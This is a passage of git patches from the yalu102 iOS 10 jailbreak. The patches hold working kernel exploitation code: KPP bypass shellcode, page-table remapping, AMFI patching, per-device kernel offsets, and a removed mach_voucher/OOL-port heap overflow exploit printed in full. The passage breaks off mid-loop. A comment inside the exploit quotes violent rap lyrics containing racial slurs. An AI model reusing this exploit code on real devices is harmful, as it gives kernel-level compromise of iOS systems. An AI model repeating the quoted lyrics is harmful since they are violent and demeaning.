find_register_value(uint32_t* opcodes, uint64_t offset, uint64_t opcode_base, uint8_t reg); extern uint64_t find_reference(uint32_t* opcodes, size_t opcode_size, uint64_t opcode_base, uint64_t target); + enum Search { SearchTextExec, SearchPrelinkExec }; -extern char uref; -extern uint64_t get_data_for_mode(uint64_t offset, enum Search mode); - +extern char uref; +uint64_t get_data_for_mode(uint64_t offset, enum Search mode); void set_text_exec(uint64_t text_exec_base_,uint64_t text_exec_size_); void set_prelink_exec(uint64_t prelink_exec_base_, uint64_t prelink_exec_size_); @@ -48,28 +47,3 @@ uint64_t find_ret_non0(); uint64_t find_ret_0(); uint64_t find_amfiret(); uint64_t find_sbops(); -#define CS_VALID 0x0000001 /* dynamically valid */ -#define CS_ADHOC 0x0000002 /* ad hoc signed */ -#define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ -#define CS_INSTALLER 0x0000008 /* has installer entitlement */ - -#define CS_HARD 0x0000100 /* don't load invalid pages */ -#define CS_KILL 0x0000200 /* kill process if it becomes invalid */ -#define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */ -#define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ -#define CS_ENFORCEMENT 0x0001000 /* require enforcement */ -#define CS_REQUIRE_LV 0x0002000 /* require library validation */ -#define CS_ENTITLEMENTS_VALIDATED 0x0004000 - -#define CS_ALLOWED_MACHO 0x00ffffe - -#define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */ -#define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */ -#define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */ -#define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */ - -#define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */ -#define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */ -#define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ -#define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */ -#endif /* patchfinder64_h */ From ac5917ccc0b385e2080a3a813023d93c2dddaa7d Mon Sep 17 00:00:00 2001 From: qwertyoruiop Date: Sun, 29 Jan 2017 03:03:01 +0100 Subject: [PATCH 10/34] early 4k support --- yalu102/jailbreak.m | 26 ++++++++++---------------- yalu102/pte_stuff.h | 10 ++++++++-- 2 files changed, 18 insertions(+), 18 deletions(-) diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index 85f0ac9..30b2cf0 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -255,8 +255,11 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) uint64_t pmap_store = find_kernel_pmap(); NSLog(@"pmap: %llx", pmap_store); - level1_table = ReadAnywhere64(ReadAnywhere64(find_kernel_pmap())); + level1_table = ReadAnywhere64(ReadAnywhere64(pmap_store)); + + + uint64_t shellcode = physalloc(0x4000); /* @@ -355,7 +358,6 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) isvad 0 == 0x4000 */ - uint64_t level0_pte = physalloc(isvad == 0 ? 0x4000 : 0x1000); uint64_t ttbr0_real = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), idlesleep_handler + idx*4 - gadget_base + 24, text_exec_base, 1); @@ -367,6 +369,8 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) copyout(level0_pte, bbuf, isvad == 0 ? 0x4000 : 0x1000); uint64_t physp = findphys_real(level0_pte); + NSLog(@"%llx - %llx", physp, level0_pte); + WriteAnywhere32(shc, 0x5800019e); // ldr x30, #40 WriteAnywhere32(shc+4, 0xd518203e); // msr ttbr1_el1, x30 @@ -410,12 +414,6 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) } mach_vm_protect(tfp0, shc, 0x4000, 0, VM_PROT_READ|VM_PROT_EXECUTE); - - uint64_t fake1 = physalloc(0x4000); - copyin(bbuf, level0_pte, 0x4000); - copyout(fake1, bbuf, 0x4000); - uint64_t fake1_p = findphys_real(fake1); - vm_address_t kppsh = 0; mach_vm_allocate(tfp0, &kppsh, 0x4000, VM_FLAGS_ANYWHERE); @@ -431,7 +429,7 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) WriteAnywhere32(kppsh+n, 0xd5182021); n+=4; // msr TTBR1_EL1, x1 WriteAnywhere32(kppsh+n, 0x10ffffe0); n+=4; // adr x0, #-4 WriteAnywhere32(kppsh+n, 0xd503201f); n+=4; // nop - WriteAnywhere32(kppsh+n, 0xd508873e); n+=4; // tlbi vae1, x30 + WriteAnywhere32(kppsh+n, isvad ? 0xd508871f : 0xd508873e); n+=4; // tlbi vae1, x30 WriteAnywhere32(kppsh+n, 0xd5033fdf); n+=4; // isb WriteAnywhere32(kppsh+n, 0xd65f03c0); n+=4; // ret WriteAnywhere64(kppsh+n, ReadAnywhere64(ttbr0_real)); n+=8; @@ -490,10 +488,10 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) TTE_SET(tte, TTE_BLOCK_ATTR_PXN_MASK, 0);\ WriteAnywhere64(tte_addr, tte);\ NSLog(@"level %llx - %llx", tte_addr, TTE_GET(tte, TTE_PHYS_VALUE_MASK));\ - }, level1_table, 2); + }, level1_table, isvad ? 1 : 2); level1_table = physp - gPhysBase + gVirtBase; - WriteAnywhere64(ReadAnywhere64(find_kernel_pmap()), level1_table); + WriteAnywhere64(ReadAnywhere64(pmap_store), level1_table); #define NewPointer(origptr) (((origptr) & PMK) | findphys_real(origptr) - gPhysBase + gVirtBase) @@ -505,8 +503,7 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) WriteAnywhere32(NewPointer(shtramp), 0x58000041); WriteAnywhere32(NewPointer(shtramp)+4, 0xd61f0020); WriteAnywhere64(NewPointer(shtramp)+8, kppsh); - - + uint64_t lwvm_write = find_lwvm_mapio_patch(); uint64_t lwvm_value = find_lwvm_mapio_newj(); RemapPage(lwvm_write); @@ -661,9 +658,6 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) WriteAnywhere64(remap + 8, shc+0x200); /* amfi shellcode */ } - copyin(bbuf, level0_pte, PSZ); - copyout(fake1, bbuf, PSZ); - for (int i = 0; i < z; i++) { WriteAnywhere64(plist[i], physcode + 0x100); diff --git a/yalu102/pte_stuff.h b/yalu102/pte_stuff.h index 6951402..0183608 100644 --- a/yalu102/pte_stuff.h +++ b/yalu102/pte_stuff.h @@ -87,10 +87,16 @@ void pagestuff_64(vm_address_t vmaddr, void (^pagestuff_64_callback)(vm_address_ vm_address_t tteaddr = 0; + + if (sz == 4096) { VMA_4K target_addr; target_addr.vmaddr = vmaddr; - + NSLog(@"level %x", target_addr.vm_info.level1_index); + if (level == 1) { + target_addr.vm_info.level1_index -= 0x1c0; + } + switch (level) { case 0: tteaddr = table + TTE_INDEX(target_addr, level0); @@ -156,7 +162,7 @@ uint64_t findphys_real(uint64_t virtaddr) { if (addr == 3) {\ physvar = TTE_GET(tte, TTE_PHYS_VALUE_MASK); } - }, level1_table, 2); + }, level1_table, isvad ? 1 : 2); return physvar; From 1b6d90541ba736dc816f298e3d718f5c7377c7c9 Mon Sep 17 00:00:00 2001 From: qwertyoruiop Date: Sun, 29 Jan 2017 04:04:08 +0100 Subject: [PATCH 11/34] ew logs --- yalu102/jailbreak.m | 8 ++------ yalu102/pte_stuff.h | 2 +- 2 files changed, 3 insertions(+), 7 deletions(-) diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index 30b2cf0..e6844ef 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -369,7 +369,6 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) copyout(level0_pte, bbuf, isvad == 0 ? 0x4000 : 0x1000); uint64_t physp = findphys_real(level0_pte); - NSLog(@"%llx - %llx", physp, level0_pte); WriteAnywhere32(shc, 0x5800019e); // ldr x30, #40 @@ -429,7 +428,7 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) WriteAnywhere32(kppsh+n, 0xd5182021); n+=4; // msr TTBR1_EL1, x1 WriteAnywhere32(kppsh+n, 0x10ffffe0); n+=4; // adr x0, #-4 WriteAnywhere32(kppsh+n, 0xd503201f); n+=4; // nop - WriteAnywhere32(kppsh+n, isvad ? 0xd508871f : 0xd508873e); n+=4; // tlbi vae1, x30 + WriteAnywhere32(kppsh+n, isvad ? 0xd508871f : 0xd508873e); n+=4; // tlbi vmalle1 (4k) / tlbi vae1, x30 (16k) WriteAnywhere32(kppsh+n, 0xd5033fdf); n+=4; // isb WriteAnywhere32(kppsh+n, 0xd65f03c0); n+=4; // ret WriteAnywhere64(kppsh+n, ReadAnywhere64(ttbr0_real)); n+=8; @@ -644,13 +643,10 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) { uint64_t point = find_amfiret()-0x18; - NSLog(@"%x %x", ReadAnywhere64(point), ReadAnywhere64(NewPointer(point))); + RemapPage((point & (~PMK))); uint64_t remap = NewPointer(point); - NSLog(@"%llx %llx", (point), (remap)); - NSLog(@"%x %x", ReadAnywhere32(point), ReadAnywhere32(remap)); - assert(ReadAnywhere32(point) == ReadAnywhere32(remap)); WriteAnywhere32(remap, 0x58000041); diff --git a/yalu102/pte_stuff.h b/yalu102/pte_stuff.h index 0183608..965b0bc 100644 --- a/yalu102/pte_stuff.h +++ b/yalu102/pte_stuff.h @@ -92,7 +92,7 @@ void pagestuff_64(vm_address_t vmaddr, void (^pagestuff_64_callback)(vm_address_ if (sz == 4096) { VMA_4K target_addr; target_addr.vmaddr = vmaddr; - NSLog(@"level %x", target_addr.vm_info.level1_index); + if (level == 1) { target_addr.vm_info.level1_index -= 0x1c0; } From c8b860240b9f3b8a1073cd0e2994004ab2eae089 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sun, 29 Jan 2017 16:23:48 +0100 Subject: [PATCH 12/34] Port over Mila432's offset changes --- yalu102/Kernels.plist | 251 +++++++++++------------------------------- 1 file changed, 65 insertions(+), 186 deletions(-) diff --git a/yalu102/Kernels.plist b/yalu102/Kernels.plist index 0e8413f..65b4300 100644 --- a/yalu102/Kernels.plist +++ b/yalu102/Kernels.plist @@ -2,259 +2,138 @@ - - Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T8010 + Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7001 allproc - 0x5EC178 - proc - 0x360 + 0x5b8528 rootvnode - 0x5F20B8 + 0x5be0b8 - - - Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7001 + Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7000 allproc - 0x5B0228 - proc - 0x360 + 0x5b8468 rootvnode - 0x5B60B8 + 0x5be0b8 - - - Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7000 + Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S8000 allproc - 0x5b0168 - proc - 0x360 + 0x5a8438 rootvnode - 0x5b60b8 + 0x5ae0b8 - - - Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S8000 + Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S5L8960X allproc - 0x5a4148 - proc - 0x360 + 0x5ac418 rootvnode - 0x5aa0b8 + 0x5b20b8 - - - Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S5L8960X + Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010 allproc - 0x5a4128 - proc - 0x360 + 0x5ec478 rootvnode - 0x5aa0b8 + 0x5f20b8 - - - Darwin Kernel Version 16.0.0: Fri Aug 5 22:15:30 PDT 2016; root:xnu-3789.1.24~11/RELEASE_ARM64_S5L8960X + Darwin Kernel Version 16.3.0: Mon Dec 19 19:56:48 PST 2016; root:xnu-3789.43.2~1/RELEASE_ARM64_T7000 allproc - 0x5a4128 - proc - 0x360 + 0x5b8468 rootvnode - 0x5aa0b8 + 0x5be0b8 - - - Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S8000 + Darwin Kernel Version 16.3.0: Tue Nov 29 20:25:47 PST 2016; root:xnu-3789.33.1~1/RELEASE_ARM64_T7000 allproc - 0x5A4148 - proc - 0x360 + 0x5b8468 rootvnode - 0x5AA0B8 + - - - Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S8000 + Darwin Kernel Version 16.1.0: Thu Sep 29 22:13:19 PDT 2016; root:xnu-3789.23.3~2/RELEASE_ARM64_T7000 allproc - 0x5A8438 - proc - 0x360 + 0x5b4168 rootvnode - 0x5AE0B8 + 0x5ba0b8 - - - Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7000 + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:10 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T8010 allproc - 0x5B8468 - proc - 0x360 + 0x5ec178 rootvnode - 0x5BE0b8 + 0x5f20b8 - - - Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S5L8960X + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7001 allproc - 0x5AC418 - proc - 0x360 + 0x5b4228 rootvnode - 0x5B20B8 + 0x5ba0b8 - - - Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010 + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7000 allproc - 0x5EC478 - proc - 0x360 + 0x5b4168 rootvnode - 0x5F20B8 + 0x5ba0b8 - - - Darwin Kernel Version 16.1.0: Thu Sep 29 22:13:19 PDT 2016; root:xnu-3789.23.3~2/RELEASE_ARM64_T7000 + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S8000 + + allproc + 0x5a4148 + rootvnode + 0x5aa0b8 + + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S5L8960X allproc - 0x5B8168 - proc - 0x360 + 0x5a4128 rootvnode - 0x5BA0B8 + 0x5aa0b8 - - - Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:10 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T8010 + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T8010 allproc - 0x5EC178 - proc - 0x360 + 0x5ec178 rootvnode - 0x5F20B8 + 0x5f20b8 - - - Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7001 + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7001 allproc - 0x5B4228 - proc - 0x360 + 0x5b0228 rootvnode - 0x5BA0B8 + 0x5b60b8 - - - Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7000 + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7000 allproc - 0x5B4168 - proc - 0x360 + 0x5b0168 rootvnode - 0x5BA0B8 + 0x5b60b8 - - - Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S8000 + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S8000 allproc - 0x5A4148 - proc - 0x360 + 0x5a4148 rootvnode - 0x5AA0B8 + 0x5aa0b8 - - - Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S5L8960X + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S5L8960X allproc - 0x5A4128 - proc - 0x360 + 0x5a4128 rootvnode - 0x5AA0B8 + 0x5aa0b8 + + Darwin Kernel Version 16.0.0: Fri Aug 5 22:15:30 PDT 2016; root:xnu-3789.1.24~11/RELEASE_ARM64_S5L8960X + + allproc + 0x5a4128 + rootvnode + 0x5aa0b8 From 6d9d697b53a926c97e5a0d9fd580d7fabc8a7a85 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sun, 29 Jan 2017 16:31:38 +0100 Subject: [PATCH 13/34] Factor tfp0 exploit out into separate file --- yalu102.xcodeproj/project.pbxproj | 14 ++ yalu102/ViewController.m | 371 +++--------------------------- yalu102/YAExploitTFP0.h | 20 ++ yalu102/YAExploitTFP0.m | 339 +++++++++++++++++++++++++++ yalu102/YAKernelOffsets.h | 20 ++ yalu102/YAKernelOffsets.m | 43 ++++ yalu102/jailbreak.h | 8 +- yalu102/jailbreak.m | 24 +- yalu102/mach_vm.h | 9 + 9 files changed, 492 insertions(+), 356 deletions(-) create mode 100644 yalu102/YAExploitTFP0.h create mode 100644 yalu102/YAExploitTFP0.m create mode 100644 yalu102/YAKernelOffsets.h create mode 100644 yalu102/YAKernelOffsets.m create mode 100644 yalu102/mach_vm.h diff --git a/yalu102.xcodeproj/project.pbxproj b/yalu102.xcodeproj/project.pbxproj index bacd1e8..4c3622e 100644 --- a/yalu102.xcodeproj/project.pbxproj +++ b/yalu102.xcodeproj/project.pbxproj @@ -9,6 +9,8 @@ /* Begin PBXBuildFile section */ A70DFA9E1E3D332500769FE9 /* include in Resources */ = {isa = PBXBuildFile; fileRef = A70DFA9D1E3D332500769FE9 /* include */; }; A70DFAA11E3D35AC00769FE9 /* Kernels.plist in Resources */ = {isa = PBXBuildFile; fileRef = A70DFAA01E3D35AC00769FE9 /* Kernels.plist */; }; + A70DFAAB1E3E35C200769FE9 /* YAKernelOffsets.m in Sources */ = {isa = PBXBuildFile; fileRef = A70DFAAA1E3E35C200769FE9 /* YAKernelOffsets.m */; }; + A70DFAAF1E3E3B8900769FE9 /* YAExploitTFP0.m in Sources */ = {isa = PBXBuildFile; fileRef = A70DFAAE1E3E3B8900769FE9 /* YAExploitTFP0.m */; }; A72023721E3CFC2B00FADBFF /* IOKit.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = A72023711E3CFBCA00FADBFF /* IOKit.framework */; }; EA1A3B9D1E391C4F009CA025 /* patchfinder64.o in Frameworks */ = {isa = PBXBuildFile; fileRef = EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */; }; EA1A3BA81E398E33009CA025 /* 0.reload.plist in Resources */ = {isa = PBXBuildFile; fileRef = EA1A3BA61E398E33009CA025 /* 0.reload.plist */; }; @@ -31,6 +33,11 @@ A70DFA9F1E3D338B00769FE9 /* mac_policy.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = mac_policy.h; sourceTree = ""; }; A70DFAA01E3D35AC00769FE9 /* Kernels.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = Kernels.plist; sourceTree = ""; }; A70DFAA21E3D8FAF00769FE9 /* csflags.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = csflags.h; sourceTree = ""; }; + A70DFAA91E3E35C200769FE9 /* YAKernelOffsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = YAKernelOffsets.h; sourceTree = ""; }; + A70DFAAA1E3E35C200769FE9 /* YAKernelOffsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = YAKernelOffsets.m; sourceTree = ""; }; + A70DFAAC1E3E389100769FE9 /* mach_vm.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = mach_vm.h; sourceTree = ""; }; + A70DFAAD1E3E3B8900769FE9 /* YAExploitTFP0.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = YAExploitTFP0.h; sourceTree = ""; }; + A70DFAAE1E3E3B8900769FE9 /* YAExploitTFP0.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = YAExploitTFP0.m; sourceTree = ""; }; A72023711E3CFBCA00FADBFF /* IOKit.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = IOKit.framework; path = System/Library/Frameworks/IOKit.framework; sourceTree = SDKROOT; }; A72023751E3CFE2E00FADBFF /* yalu102.xcconfig */ = {isa = PBXFileReference; lastKnownFileType = text.xcconfig; path = yalu102.xcconfig; sourceTree = ""; }; EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = patchfinder64.h; sourceTree = ""; }; @@ -119,12 +126,17 @@ EA9900F71E1E9F060056FEBD /* Info.plist */, A70DFAA01E3D35AC00769FE9 /* Kernels.plist */, A70DFA9F1E3D338B00769FE9 /* mac_policy.h */, + A70DFAAC1E3E389100769FE9 /* mach_vm.h */, EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */, EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */, EA9900EC1E1E9F060056FEBD /* ViewController.h */, EA9900ED1E1E9F060056FEBD /* ViewController.m */, A70DFA9C1E3D314F00769FE9 /* jailbreak.h */, EA99010D1E21A1560056FEBD /* jailbreak.m */, + A70DFAAD1E3E3B8900769FE9 /* YAExploitTFP0.h */, + A70DFAAE1E3E3B8900769FE9 /* YAExploitTFP0.m */, + A70DFAA91E3E35C200769FE9 /* YAKernelOffsets.h */, + A70DFAAA1E3E35C200769FE9 /* YAKernelOffsets.m */, ); path = yalu102; sourceTree = ""; @@ -236,6 +248,8 @@ files = ( EA9900EE1E1E9F060056FEBD /* ViewController.m in Sources */, EA9900EB1E1E9F060056FEBD /* AppDelegate.m in Sources */, + A70DFAAB1E3E35C200769FE9 /* YAKernelOffsets.m in Sources */, + A70DFAAF1E3E3B8900769FE9 /* YAExploitTFP0.m in Sources */, EA99010E1E21A1560056FEBD /* jailbreak.m in Sources */, EA9900E81E1E9F060056FEBD /* main.m in Sources */, ); diff --git a/yalu102/ViewController.m b/yalu102/ViewController.m index ffe1fea..fc3dba8 100644 --- a/yalu102/ViewController.m +++ b/yalu102/ViewController.m @@ -7,23 +7,15 @@ // #import "ViewController.h" -#import -#import -#import -#import +#import "YAExploitTFP0.h" +#import "YAKernelOffsets.h" +#import "jailbreak.h" #import -extern uint64_t procoff; - -typedef struct { - mach_msg_header_t head; - mach_msg_body_t msgh_body; - mach_msg_ool_ports_descriptor_t desc[256]; - char pad[4096]; -} sprz; - @interface ViewController () +@property (nonatomic, strong) YAKernelOffsets *offsets; + @end @implementation ViewController @@ -31,346 +23,43 @@ @implementation ViewController - (void)viewDidLoad { [super viewDidLoad]; - init_offsets(); - struct utsname u = { 0 }; uname(&u); - if (strstr(u.version, "MarijuanARM")) { [dope setEnabled:NO]; [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; + return; } -} - -typedef natural_t not_natural_t; - -struct not_essers_ipc_object { - not_natural_t io_bits; - not_natural_t io_references; - char io_lock_data[1337]; - /* - - https://www.youtube.com/watch?v=ZADJ8S1qH3U - - - [Intro] - Lets get it - Steve Drive - R.I.P L'A Capone - OTF - These nigga's steady woofing like they want beef, want beef? - You want smoke? You want smoke? Just tell me - - [Hook] - These niggas steady woofing like they want beef, want beef?[You want smoke?] - I can make that happen if you want beef, you want beef?[You want smoke?] - Catch you while you're capping with this semi, semi - Put the semi-automatic to your kidney, kidney - - [Verse 1] - Put the semi-automatic to your kidney, kidney - I'm off the dope I got the pole you talking tough you getting smoked - These nigga's steady woofing like they want beef, but I really know - Glock or nickel yeah that bitch go, I'm going like I'm at a fucking show - I'm off Tu pack saying fuck Jojo[Fuck Jojo] - Talking shit get your life took no joke - I'm with my nigga's and my niggas ain't no joke - And if you got that fucking bag then you getting poked - And if you acting tough, I'ma fucking blow, and that's on Pluto[On Pluto] - Me and Durk finna spaz, and I put that on the guys, it's homicides - Cause we dropping Y's[Die Y, Die Y], head shot got him traumatized - And you want beef?[You want beef fu nigga?] but when I see you, you don't speak?[You don't even talk] - I got my 9 on me[Rondo] and I'ma blow and that's on me[I'm Rondo] - I'm getting tree tree[Getting dope], getting top from a bitch named Kiki - - [Chorus] - - [Verse 2] - And if you really want smoke[You want smoke little nigga?] - I will give your ass smoke[Give your ass smoke little nigga?] - This Glock 9 bitch I tote, and I will put it to your throat - I'm off this Tooka pack and no L'A, I'ma go crazy - You supposed to be my nigga but actin' like a fan that’s crazy - What the fuck wrong with these nigga's, they fugazi - I made this song for the niggas, cause they crazy - Separate me from them niggas[Separate Rondo] - Pull up on your block, with the mops - Then I hit the dip and put him up in case of attempts[Incase a nigga survive] - But we don't make throws, we shoot like Pimp[We shoot to kill] - I got 23[Two three] So i don't fucking speak[I don't speak] - Riding fast, I hit the dash, ain't gon last[You ain't gonna last nigga], I'ma blast[Cause ima blast on a nigga] - Numba Nine, bitch [I'm #9 lil nigga], and I'm a sav, bitch - - [Chorus] - */ -}; - - - -#define IO_BITS_ACTIVE 0x80000000 -#define IKOT_TASK 2 -#define IKOT_IOKIT_CONNECT 29 -#define IKOT_CLOCK 25 - -char dt[128]; -- (IBAction)yolo:(UIButton*)sender -{ - /* - - we out here! - - */ - - mach_port_t vch = 0; - - mach_voucher_attr_recipe_data_t *data = malloc(sizeof(mach_voucher_attr_recipe_data_t) + 0x10); - data->content_size = 0; - data->key=MACH_VOUCHER_ATTR_KEY_BANK; - data->command=610; - data->previous_voucher=MACH_PORT_NULL; - - kern_return_t lol = host_create_mach_voucher(mach_host_self(), data, sizeof(mach_voucher_attr_recipe_data_t), &vch); - - assert(lol==0 && vch!=0); - - - unsigned char* odata = mmap(0, 0x8000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0); - unsigned char* fdata = mmap(odata+0x4000, 0x4000, PROT_NONE, MAP_PRIVATE|MAP_ANON|MAP_FIXED, -1, 0); - assert(fdata == odata + 0x4000); - memset(odata, 0x42, 0x0); - - - uint64_t rsz = 0x100; // alloc size; - fdata -= rsz + 0x100; // overflow full chunk - - struct not_essers_ipc_object* fakeport = mmap(0, 0x8000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0); - - mlock(fakeport, 0x8000); - - fakeport->io_bits = IO_BITS_ACTIVE | IKOT_CLOCK; - fakeport->io_lock_data[12] = 0x11; - - *(uint64_t*) (fdata + rsz) = (uint64_t) fakeport; - - - mach_port_t* ports = calloc(800, sizeof(mach_port_t)); - - for (int i = 0; i < 800; i++) { - mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports[i]); - mach_port_insert_right(mach_task_self(), ports[i], ports[i], MACH_MSG_TYPE_MAKE_SEND); - } - sprz msg1; - - memset(&msg1, 0, sizeof(sprz)); - sprz msg2; - - memset(&msg2, 0, sizeof(sprz)); - msg1.msgh_body.msgh_descriptor_count = 128; - - msg1.head.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0) | MACH_MSGH_BITS_COMPLEX; - msg1.head.msgh_local_port = MACH_PORT_NULL; - msg1.head.msgh_size = sizeof(msg1)-2048; - - mach_port_t* buffer = calloc(0x1000, sizeof(mach_port_t)); - for (int i = 0; i < 0x1000; i++) { - buffer[i] = MACH_PORT_DEAD; - } - - for (int i = 0; i < 256; i++) { - msg1.desc[i].address = buffer; - msg1.desc[i].count = 0x100/8; - msg1.desc[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR; - msg1.desc[i].disposition = 19; - } - - pthread_yield_np(); - for (int i=1; i<300; i++) { - msg1.head.msgh_remote_port = ports[i]; - kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); - assert(kret==0); - } - - pthread_yield_np(); - for (int i=500; i<800; i++) { - msg1.head.msgh_remote_port = ports[i]; - kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); - assert(kret==0); - } - - pthread_yield_np(); - for (int i=300; i<500; i++) { - msg1.head.msgh_remote_port = ports[i]; - if (i%4 == 0) { - msg1.msgh_body.msgh_descriptor_count = 1; - } else { - msg1.msgh_body.msgh_descriptor_count = 256; - } - kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); - assert(kret==0); - } - - pthread_yield_np(); - for (int i = 300; i<500; i+=4) { - 